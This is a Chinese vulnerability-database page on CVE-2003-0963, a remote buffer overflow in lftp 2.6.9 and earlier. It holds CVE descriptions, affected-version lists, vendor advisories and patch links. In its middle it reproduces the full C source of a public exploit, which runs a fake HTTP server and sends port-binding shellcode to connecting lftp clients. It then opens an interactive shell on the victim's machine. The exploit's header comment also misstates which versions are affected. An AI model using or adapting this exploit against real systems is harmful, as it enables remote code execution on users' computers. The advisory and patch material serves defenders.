CVE-2003-0963
CVSS7.5
发布时间 :2004-01-05 00:00:00
修订时间 :2016-10-17 22:38:33
NMCOES    

[原文]Buffer overflows in (1) try_netscape_proxy and (2) try_squid_eplf for lftp 2.6.9 and earlier allow remote HTTP servers to execute arbitrary code via long directory names that are processed by the ls or rels commands.


[CNNVD]lftp Try_Netscape_Proxy远程缓冲区溢出漏洞(CNNVD-200401-026)

        
        lftp是一款支持多平台,支持多模式(ftp、ftps、http、https、hftp等)的基于命令行FTP客户端。
        lftp在接收到从远程HTTP服务器返回的内容时不正确处理部分目录信息,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以lftp进程权限在系统上执行任意指令。
        问题存在于src/HttpDir.cc文件中的try_netscape_proxy()函数,由于lftp在使用HTTP或者HTTPS进行WEB服务器连接,并使用lftp的"ls"或"rels"命令对特殊目录进行浏览时缺少充分的边界缓冲区检查,精心构建目录数据,可导致触发缓冲区溢出,精心构建提交数据可能以lftp进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:alexander_v._lukyanov:lftp:2.6.9
cpe:/a:alexander_v._lukyanov:lftp:2.3
cpe:/a:alexander_v._lukyanov:lftp:2.6.8
cpe:/a:alexander_v._lukyanov:lftp:2.6.5
cpe:/a:alexander_v._lukyanov:lftp:2.4.9
cpe:/a:alexander_v._lukyanov:lftp:2.6.7
cpe:/a:alexander_v._lukyanov:lftp:2.6.4
cpe:/a:alexander_v._lukyanov:lftp:2.5.2
cpe:/a:alexander_v._lukyanov:lftp:2.6.6
cpe:/a:alexander_v._lukyanov:lftp:2.6.3
cpe:/a:alexander_v._lukyanov:lftp:2.6.0

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:11180Buffer overflows in (1) try_netscape_proxy and (2) try_squid_eplf for lftp 2.6.9 and earlier allow remote HTTP servers to execute arbitrary ...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0963
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0963
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200401-026
(官方数据源) CNNVD

- 其它链接及资源

ftp://patches.sgi.com/support/free/security/advisories/20040101-01-U
(UNKNOWN)  SGI  20040101-01-U
ftp://patches.sgi.com/support/free/security/advisories/20040202-01-U.asc
(UNKNOWN)  SGI  20040202-01-U
http://marc.info/?l=bugtraq&m=107126386226196&w=2
(UNKNOWN)  BUGTRAQ  20031212 [slackware-security] lftp security update (SSA:2003-346-01)
http://marc.info/?l=bugtraq&m=107152267121513&w=2
(UNKNOWN)  BUGTRAQ  20031213 lftp buffer overflows
http://marc.info/?l=bugtraq&m=107167974714484&w=2
(UNKNOWN)  BUGTRAQ  20031217 [OpenPKG-SA-2003.053] OpenPKG Security Advisory (lftp)
http://marc.info/?l=bugtraq&m=107177409418121&w=2
(UNKNOWN)  BUGTRAQ  20031218 GLSA: lftp (200312-07)
http://marc.info/?l=bugtraq&m=107340499504411&w=2
(UNKNOWN)  CONECTIVA  CLA-2004:800
http://www.debian.org/security/2004/dsa-406
(UNKNOWN)  DEBIAN  DSA-406
http://www.mandriva.com/security/advisories?name=MDKSA-2003:116
(UNKNOWN)  MANDRAKE  MDKSA-2003:116
http://www.novell.com/linux/security/advisories/2003_051_lftp.html
(UNKNOWN)  SUSE  SuSE-SA:2003:051
http://www.redhat.com/support/errata/RHSA-2003-403.html
(UNKNOWN)  REDHAT  RHSA-2003:403
http://www.redhat.com/support/errata/RHSA-2003-404.html
(UNKNOWN)  REDHAT  RHSA-2003:404

- 漏洞信息

lftp Try_Netscape_Proxy远程缓冲区溢出漏洞
高危 边界条件错误
2004-01-05 00:00:00 2005-10-20 00:00:00
远程  
        
        lftp是一款支持多平台,支持多模式(ftp、ftps、http、https、hftp等)的基于命令行FTP客户端。
        lftp在接收到从远程HTTP服务器返回的内容时不正确处理部分目录信息,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以lftp进程权限在系统上执行任意指令。
        问题存在于src/HttpDir.cc文件中的try_netscape_proxy()函数,由于lftp在使用HTTP或者HTTPS进行WEB服务器连接,并使用lftp的"ls"或"rels"命令对特殊目录进行浏览时缺少充分的边界缓冲区检查,精心构建目录数据,可导致触发缓冲区溢出,精心构建提交数据可能以lftp进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        MandrakeSoft
        ------------
        MandrakeSoft已经为此发布了一个安全公告(MDKSA-2003:116)以及相应补丁:
        MDKSA-2003:116:Updated lftp packages fix buffer overflow vulnerability
        链接:
        http://www.linux-mandrake.com/en/security/2003/2003-116.php

        补丁下载:
        Updated Packages:
        Corporate Server 2.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/RPMS/lftp-2.6.0-1.1.C21mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/SRPMS/lftp-2.6.0-1.1.C21mdk.src.rpm
        Corporate Server 2.1/x86_64:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/x86_64/corporate/2.1/RPMS/lftp-2.6.0-1.1.C21mdk.x86_64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/x86_64/corporate/2.1/SRPMS/lftp-2.6.0-1.1.C21mdk.src.rpm
        Mandrake Linux 9.0:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.0/RPMS/lftp-2.6.0-1.1.90mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.0/SRPMS/lftp-2.6.0-1.1.90mdk.src.rpm
        Mandrake Linux 9.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.1/RPMS/lftp-2.6.4-2.1.91mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.1/SRPMS/lftp-2.6.4-2.1.91mdk.src.rpm
        Mandrake Linux 9.1/PPC:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/9.1/RPMS/lftp-2.6.4-2.1.91mdk.ppc.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/9.1/SRPMS/lftp-2.6.4-2.1.91mdk.src.rpm
        Mandrake Linux 9.2:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/RPMS/lftp-2.6.6-2.1.92mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/SRPMS/lftp-2.6.6-2.1.92mdk.src.rpm
        Mandrake Linux 9.2/AMD64:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/RPMS/lftp-2.6.6-2.1.92mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/SRPMS/lftp-2.6.6-2.1.92mdk.src.rpm
        _______________________________________________________________________
        To upgrade automatically use MandrakeUpdate or urpmi. The verification
        of md5 checksums and GPG signatures is performed automatically for you.
        A list of FTP mirrors can be obtained from:
        
        http://www.mandrakesecure.net/en/ftp.php

        上述升级软件还可以在下列地址中的任意一个镜像ftp服务器上下载:
        
        http://www.mandrakesecure.net/en/ftp.php

        RedHat
        ------
        RedHat已经为此发布了一个安全公告(RHSA-2003:403-01)以及相应补丁:
        RHSA-2003:403-01:Updated lftp packages fix security vulnerability
        链接:https://www.redhat.com/support/errata/RHSA-2003-403.html
        补丁下载:
        Alexander V. Lukyanov lftp 2.4.9:
        RedHat Patch lftp-2.4.9-2.i386.rpm
        ftp://updates.redhat.com/7.2/en/os/i386/lftp-2.4.9-2.i386.rpm
        RedHat Patch lftp-2.4.9-2.ia64.rpm
        ftp://updates.redhat.com/7.2/en/os/ia64/lftp-2.4.9-2.ia64.rpm
        RedHat Patch lftp-2.4.9-2.i386.rpm
        ftp://updates.redhat.com/7.3/en/os/i386/lftp-2.4.9-2.i386.rpm
        Alexander V. Lukyanov lftp 2.5.2:
        RedHat Patch lftp-2.5.2-6.i386.rpm
        ftp://updates.redhat.com/8.0/en/os/i386/lftp-2.5.2-6.i386.rpm
        Alexander V. Lukyanov lftp 2.6.3:
        RedHat Patch lftp-2.6.3-4.i386.rpm
        ftp://updates.redhat.com/9/en/os/i386/lftp-2.6.3-4.i386.rpm
        Alexander V. Lukyanov lftp 2.6.5:
        Fedora Upgrade lftp-2.6.10-1.i386.rpm
        
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/i386/lftp-2.6.10-1.i386.rpm

        Fedora Upgrade lftp-debuginfo-2.6.10-1.i386.rpm
        
        http://download.fedora.redhat.com/pub/fedora/linux/core/updates/1/i386/debug/lftp-debuginfo-2.6.10-1.i386.rpm

        Alexander V. Lukyanov
        ---------------------
        lftp 2.6.10已经修正此漏洞:
        
        http://lftp.yar.ru/get.html

        另外2.6.9版本的补丁也可以从如下地址获得:
        
        http://labben.abm.uu.se/~ulha9485/lftp-advisory-data.tar.gz

- 漏洞信息 (143)

lftp <= 2.6.9 Remote Stack based Overflow Exploit (EDBID:143)
linux remote
2004-01-14 Verified
0 Li0n7
N/A [点击下载]
/*
 * lftp remote stack-based overflow exploit by Li0n7 voila fr
 *
 * Vulnerability discovered by Ulf Harnhammar Ulf.Harnhammar.9485 student uu se
 *
 * Lftp versions later than 2.6.10 are prone to a remotly exploitable stack-based
 * overflow in try_netscape_proxy() and try_squid_eplf( (src/HttpDir.cc). This
 * bad coded proof-of-concept demonstrates the exploitation by exploiting the
 * vulnerable function try_netscape_proxy() (HttpDir.cc:358) and it needs more targets
 * to be efficient. Please note that this vulnerability is really hard to exploit
 * since lots of parameters come into play and are different from a platform to another,
 * for we have to overwrite some variables and registers before overwriting eip.
 * With some time and lot of patience, you should find your own parameters by using
 * GDB. Params to edit are marked with a '!' in the POC code. Moreover, I have edited
 * Bighawk's port binding shellcode not to contain any white character such as \r,\t,\v,
 * \f,\n or \20 because we are exploiting a sscanf function.
 *
 * usage: ./lftp-exp [-f <path>][-p <port>][-r <ret>][-t <target>]
 * -f <path>: create <path>index.html
 * -p <port>: run a fake lftp server on port <port> (default: 80)
 * -r <ret>: return address you would like to use
 * -t <target>: choose the target among the platforms available
 * Platforms supported are:
 * num: 0 - slack 9.0 - 0xbffff770
 *
 * For instance: ./lftp-exp -p 80 -t 0
 * ./lftp-exp -f / -t 0
 *
 * A poil !
 */

#include <stdio.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

#define BUFFERSIZE 117 /*!*/
#define SIZE 256

#define D_BACK 26112
#define D_RET 0xbffff770
#define D_PORT 80

#define DUMMY1 0xbffff140 /*!*/
#define DUMMY2 0xbffff810 /*!*/

#define OK "cd ok, cwd=/\n"


/* Edited bighawk 78 bytes portbinding shellcode */
/* size: 80 bytes */
/* Does not contain any white character i.e \r,\t,\v,\f,\n,\20 */

char shellcode[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0"
"\x66\x52\x50\xcd\x80\x43\x66\x53\x89\xe1\x6a\x10"
"\x51\x50\x89\xe1\x52\x50\xb0\x66\xcd\x80\x89\xe1"
"\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x89"
"\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\xb0\x28\x2c\x1d\xcd\x80";

char badc0ded[] =
{0x20,0x09,0x0a,0x0b,0x0c,0x0d,0x00};

char *lftp_versions[] =
{
  "lftp/2.3",
  "lftp/2.4.9",
  "lftp/2.5.2",
  "lftp/2.6.0",
  "lftp/2.6.3",
  "lftp/2.6.4",
  "lftp/2.6.5",
  "lftp/2.6.6",
  "lftp/2.6.7",
  "lftp/2.6.8",
  "lftp/2.6.9",
   
};

unsigned long ret_addr = D_RET;

int back_connection(long host);
int check_shellcode(char *host);
void check_version();
char * build(char *host);
int create_file(char *path);
void wait_connection(int port);
long resolve_host(u_char *host_name);
void die(char *argv);

struct os_ret_addr
{
  int num;
  char *plat;
  long ret;
};

struct os_ret_addr exp_os[]=
{
  {0,"slack 9.0",0xbffff770},
  {0,NULL,0}
};


int
main(int argc,char *argv[])
{
  int i, option, port = D_PORT;
  long host = 0;
  char * option_list = "f:p:r:t:", path[128];

  opterr = 0;

  if (argc < 2) die(argv[0]);
  while((option = getopt(argc,argv,option_list)) != -1)
    switch(option)
    {
      case 'f':
      strncpy(path,optarg,sizeof(path)-1);
      path[sizeof(path)-1] = '\0';
      create_file(path);
      return 0;
      case 'p':
      port = atoi(optarg);
      if(port > 65535 || port < 0) exit(-1);
      break;
      case 'r':
      ret_addr = atol(optarg);
      if(ret_addr > 0xbfffffff || ret_addr < 0x00000000) exit(1);
      break;
      case 't':
      for(i=0; exp_os[i].plat != NULL; i++)
      if(atoi(optarg) > i || atoi(optarg) < 0)
      {
        fprintf(stderr," Platforms supported are:\n");
        for(i=0; exp_os[i].plat != NULL; i++)
          fprintf(stderr," num: %i - %s - 0x%x\n",i,exp_os[i].plat,exp_os[i].ret);
          exit(1);
      }
      ret_addr = exp_os[atoi(optarg)].ret;
      break;
      case '?':
      fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
      die(argv[0]);
    }
 
  wait_connection(port);
  return 0;
}


int
check_shellcode(char *host)
{
  int i,j;
  for(i=0;i<strlen(shellcode);i++)
    for(j=0;j<strlen(badc0ded);j++)
      if(shellcode[i] == badc0ded[j])
      {
      fprintf(stderr,"[%s] badc0ded shellcode!\n",host);
      return -1;
      }
  return 0;
}


void
check_version(char *version)
{
  int i;
  for(i=0;i<sizeof(lftp_versions);i++)
    if(!strcmp(lftp_versions[i],version))
    {
      fprintf(stdout,"(vulnerable).\n");
      return;
    }
  fprintf(stdout,"(not vulnerable).\n");
  return;
}


char
*build(char *host)
{
  char *buffer,*ptr;
  int i;
  unsigned long *addr_ptr;

  fprintf(stdout,"[%s] Building evil string to send (using ret 0x%x)...\n",host,ret_addr);

  buffer = (char *)malloc(SIZE+1);

  if(!buffer)
  {
    fprintf(stderr,"[-] Can't allocate memory,exiting...\n");
    exit(1);
  }

  ptr = buffer;
  memset(ptr,0x90,BUFFERSIZE-strlen(shellcode));
  ptr += BUFFERSIZE-strlen(shellcode);

  if((i = check_shellcode(host)) < 0) exit(1);

  for(i=0;i<strlen(shellcode);i++)
    *ptr++ = shellcode[i];

  /* You might need to modify the padding too */
  addr_ptr = (long *)ptr;
  for(i=0;i<24;i++)
   *(addr_ptr++) = DUMMY1;
  for(i=0;i<8;i++)
   *(addr_ptr++) = DUMMY2;
  *(addr_ptr++) = ret_addr; /* EIP */
  *(addr_ptr++) = DUMMY2;

  ptr = (char *)addr_ptr;
  *ptr = 0x0;
  return buffer;
}


int
create_file(char *path)
{
  int fd;
  char buffer[512], file[256];
  ssize_t written;

  memset(file,0,256);
  memset(buffer,0,512);

  strcat(file,path);
  strcat(file,"index.html");

  fd = open(file,O_WRONLY | O_CREAT | O_TRUNC,0644);
  if(fd < 0)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    exit(0);
  }
  snprintf(buffer,512,"<a href=\"/\">empty</a> Fri May 30 10:09:06 2001 %s\n",build("+"));
  written = write(fd,buffer,512);
  if(written != 512)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    exit(0);
  }
  close(fd);
  fprintf(stdout,"[+] File %s successfuly created.\n",file);
  return 0;
}


int
back_connection(long host)
{
  struct sockaddr_in s;
  u_char sock_buf[4096];
  fd_set fds;
  int fd,size;
  char *command="/bin/uname -a ; /usr/bin/id;\n";

  fd = socket(AF_INET, SOCK_STREAM, 0);
  if (fd < 0)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    exit(1);
  }

  s.sin_family = AF_INET;
  s.sin_port = htons(D_BACK);
  s.sin_addr.s_addr = host;

  if (connect(fd, (struct sockaddr *)&s, sizeof(struct sockaddr)) == -1)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    close(fd);
    return 0;
  }

  fprintf(stdout, "[+] Let's rock on!\n");

  size = send(fd, command, strlen(command), 0);
  if(size < 0)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    close(fd);
    exit(1);
  }

  for (;;)
  {
    FD_ZERO(&fds);
    FD_SET(0, &fds);
    FD_SET(fd, &fds);

    if (select(255, &fds, NULL, NULL, NULL) == -1)
    {
      fprintf(stderr,"[-] %s\n",strerror(errno));
      close(fd);
      exit(1);
    }

    memset(sock_buf, 0, sizeof(sock_buf));

    if (FD_ISSET(fd, &fds))
    {
      if (recv(fd, sock_buf, sizeof(sock_buf), 0) == -1)
      {
      fprintf(stderr, "[-] Connection closed by remote host,exiting...\n");
      close(fd);
      exit(1);
      }

      fprintf(stderr, "%s", sock_buf);
    }

    if (FD_ISSET(0, &fds))
    {
      read(0, sock_buf, sizeof(sock_buf));
      write(fd, sock_buf, strlen(sock_buf));
    }
  }
  return 0;
}


void
wait_connection(int port)
{
  struct sockaddr_in s;
  int size, fd, fd2, i, r, cancel = 0;
  char data[1024], version[32], request[512];
  char *ptr;
  long host = 0;

  memset(data,0,1024);

  fprintf(stdout,"[+] Setting up a fake HTTP server...\n");
 
  fd = socket(AF_INET,SOCK_STREAM,0);
  if(fd < 0)
  {
    fprintf(stderr,"[-] %s\n",strerror(errno));
    exit(1);
  }

  s.sin_family = AF_INET;
  s.sin_port = htons(port);
  s.sin_addr.s_addr = 0;

  bind(fd,(struct sockaddr *) &s,sizeof(s));
  listen(fd,1);
  size = sizeof(s);
  
  fprintf(stdout,"[+] Awaiting connection on port %i\n",port);

  while(1)
  {
    cancel = 0;
    fd2 = accept(fd,(struct sockaddr *) &s, &size);

    if(!fork())
    {
      close(fd);
      while(1)
      {
      memset(data,0,1024);
      r = read(fd2,data,1024);
      if((ptr = strstr(data,"User-Agent: lftp")) != NULL)
      {
        if(strstr(data,"HEAD"))
        {
          fprintf(stdout,"[%s] HEAD request received.\n",inet_ntoa(s.sin_addr));
          size = send(fd2, OK, strlen(OK), 0);
          if(size < 0)
          {
          fprintf(stderr,"[-] %s\n",strerror(errno));
          close(fd2);
          exit(1);
          }
        }
        if(strstr(data,"GET"))
        {
          memset(request,0,512);
          memset(version,0,32);

          strncpy(version,ptr+12,10);
          version[sizeof(version)-1] = '\0';

          fprintf(stdout,"[%s] GET request received.\n",inet_ntoa(s.sin_addr));
          fprintf(stdout,"[%s] Remote version of lftp: %s ",inet_ntoa(s.sin_addr),version);
          check_version(version);

          snprintf(request,512,"HTTP/1.1 200 OK\n"
                 "Server: thttpd/2.21 20apr2001\n"
                 "Content-Type: text/html\n"
                 "Date: Sun, 21 Dec 2003 16:29:44 GMT\n"
                 "Last-Modified: Sun, 21 Dec 2003 16:23:41 GMT\n"
                 "Accept-Ranges: bytes\n"
                 "Connection: close\n\n"
                 "<a href=\"/\">empty</a>\tFri May 30 10:09:06 2001 %s\n",build((char*)inet_ntoa(s.sin_addr)));

          size = send(fd2, request, strlen(request), 0);
          if(size < 0)
          {
          fprintf(stderr,"[-] %s\n",strerror(errno));
          close(fd2);
          exit(1);
          }
          sleep(2);
          host = resolve_host((char *)inet_ntoa(s.sin_addr));
          back_connection(host);
          cancel = 1;
          break;
        }
      }
      }
      if(cancel == 1) break;
    }
    close(fd2);
  }
  return;
}


long resolve_host(u_char *host_name)
{
  struct in_addr addr;
  struct hostent *host_ent;

  addr.s_addr = inet_addr(host_name);
  if (addr.s_addr == -1)
  {
    host_ent = gethostbyname(host_name);
    if (!host_ent) return(0);
    memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
  }

  return(addr.s_addr);
}


void
die(char *argv)
{
  int i;
  fprintf(stdout,"\t Remote exploit for lftp < 2.6.10 by Li0n7 \n");
  fprintf(stdout,"\n usage: %s [-f <path>][-p <port>][-r <ret>][-t <target>]\n",argv);
  fprintf(stdout," -f <path>: create <path>index.html\n");
  fprintf(stdout," -p <port>: run a fake lftp server on port <port> (default: 80)\n");
  fprintf(stdout," -r <ret>: return address you would like to use\n");
  fprintf(stdout," -t <target>: choose the target among the platforms available\n");
  fprintf(stdout," Platforms supported are:\n");
  for(i=0; exp_os[i].plat != NULL; i++)
    fprintf(stderr," num: %i - %s - 0x%x\n",i,exp_os[i].plat,exp_os[i].ret);
  fprintf(stdout,"\n Vulnerability discovered by Ulf Harnhammar <Ulf.Harnhammar.9485@student.uu.se> \n");
  fprintf(stdout," Contact me: Li0n7@voila.fr\n\n");
  exit(1);
}


// milw0rm.com [2004-01-14]
		

- 漏洞信息

3015
lftp HTTP Directory Name Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

A remote overflow exists in LFTP. The FTP Client fails to Check boundaries in incoming data resulting in a buffer overflow. With a specially crafted request, an attacker can cause compromise of a user's system resulting in a loss of control.

- 时间线

2003-12-12 2003-12-12
Unknow Unknow

- 解决方案

Upgrade to version 2.6.10 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Do not use the client.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

lftp Try_Squid_Eplf Buffer Overflow Vulnerability
Boundary Condition Error 9212
Yes No
2003-12-15 12:00:00 2009-07-12 12:56:00
Discovered by Ulf Harnhammar <Ulf.Harnhammar.9485@student.uu.se>.

- 受影响的程序版本

Slackware Linux 9.1
Slackware Linux 9.0
Slackware Linux 8.1
Slackware Linux -current
SGI ProPack 2.4
SGI ProPack 2.3
Alexander V. Lukyanov lftp 2.6.9
+ Conectiva Linux 9.0
+ Conectiva Linux 8.0
+ OpenPKG OpenPKG Current
Alexander V. Lukyanov lftp 2.6.8
Alexander V. Lukyanov lftp 2.6.7
Alexander V. Lukyanov lftp 2.6.6
+ Mandriva Linux Mandrake 9.2
+ OpenPKG OpenPKG 1.3
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 6.5
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
Alexander V. Lukyanov lftp 2.6.5
+ Red Hat Fedora Core1
Alexander V. Lukyanov lftp 2.6.4
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ OpenPKG OpenPKG 1.2
Alexander V. Lukyanov lftp 2.6.3
+ Red Hat Enterprise Linux AS 3
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ RedHat Linux 9.0 i386
Alexander V. Lukyanov lftp 2.6 .0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
Alexander V. Lukyanov lftp 2.5.2
+ RedHat Linux 8.0 i386
Alexander V. Lukyanov lftp 2.4.9
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
Alexander V. Lukyanov lftp 2.3
Alexander V. Lukyanov lftp 2.6.10

- 不受影响的程序版本

Alexander V. Lukyanov lftp 2.6.10

- 漏洞讨论

It has been reported that the lftp file transfer client is vulnerable to a remotely exploitable buffer overflow condition. The vulnerability is present when lftp is used to retrieve content from a remote HTTP server. According to the report, the client does not properly handle special directories that exist on the server. These failures can be exploited by operators of web servers to execute arbitrary instructions on the host running lftp. Any such code would run with the privileges of the user who invoked lftp.

** This BID, originally entitled "lftp Buffer Overflow Vulnerabilities", has been divided into two distinct issues. BID 9210 has also been revised to cover one of the issues described in the initial version of this BID.

- 漏洞利用

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

The vulnerability is fixed in version 2.6.10:

http://lftp.yar.ru/get.html

A patch that applies to 2.6.9 is also available:

http://labben.abm.uu.se/~ulha9485/lftp-advisory-data.tar.gz

OpenPKG has released an advisory (OpenPKG-SA-2003.053) with fixes to address these issues. Please see the referenced advisory for further information. Fixes are linked below.

SuSE has released an advisory with fixes to address these issues. Please see the referenced advisory for more information.

RedHat has released fixes for the Fedora project. Users are advised to download the fixed packages.

Mandrake has released advisory MDKSA-2003:116 with fixes to address this issue.

Red Hat has released security advisory RHSA-2003:403-01 to address this issue. Additionally, Red Hat has released advisory RHSA-2003:404-08 to address this issue in affected Enterprise operating systems. Users are advised to run up2date to resolve this issue.

Gentoo has released advisory 200312-07 to address this issue. Affected users are advised to execute the following commands:

emerge sync
emerge -pv '>=net-ftp/lftp-2.6.10'
emerge '>=net-ftp/lftp-2.6.10'
emerge clean

Slackware have released an advisory (SSA:2003-346-01) and fixes to address this issue.

Debian has released advisory DSA 406-1 to address this issue.

Conectiva has released advisory CLA-2004:800 to address this issue.

SGI has released SGI Advanced Linux Environment security update #8 (20040101-01-U) to provide fixes for this issue. Please see the attached advisory for more details.

TurboLinux has released advisory TLSA-2004-2 to address this issue. Please see the reference section for more details.

SGI has released an advisory 20040202-01-U to address this and other issues in SGI ProPack 2.4. Please see the referenced advisory for more information. Fixes are available below:


Slackware Linux -current

SGI ProPack 2.3

SGI ProPack 2.4

Alexander V. Lukyanov lftp 2.4.9

Alexander V. Lukyanov lftp 2.5.2

Alexander V. Lukyanov lftp 2.6 .0

Alexander V. Lukyanov lftp 2.6.3

Alexander V. Lukyanov lftp 2.6.4

Alexander V. Lukyanov lftp 2.6.5

Alexander V. Lukyanov lftp 2.6.6

Alexander V. Lukyanov lftp 2.6.9

Slackware Linux 8.1

Slackware Linux 9.0

Slackware Linux 9.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站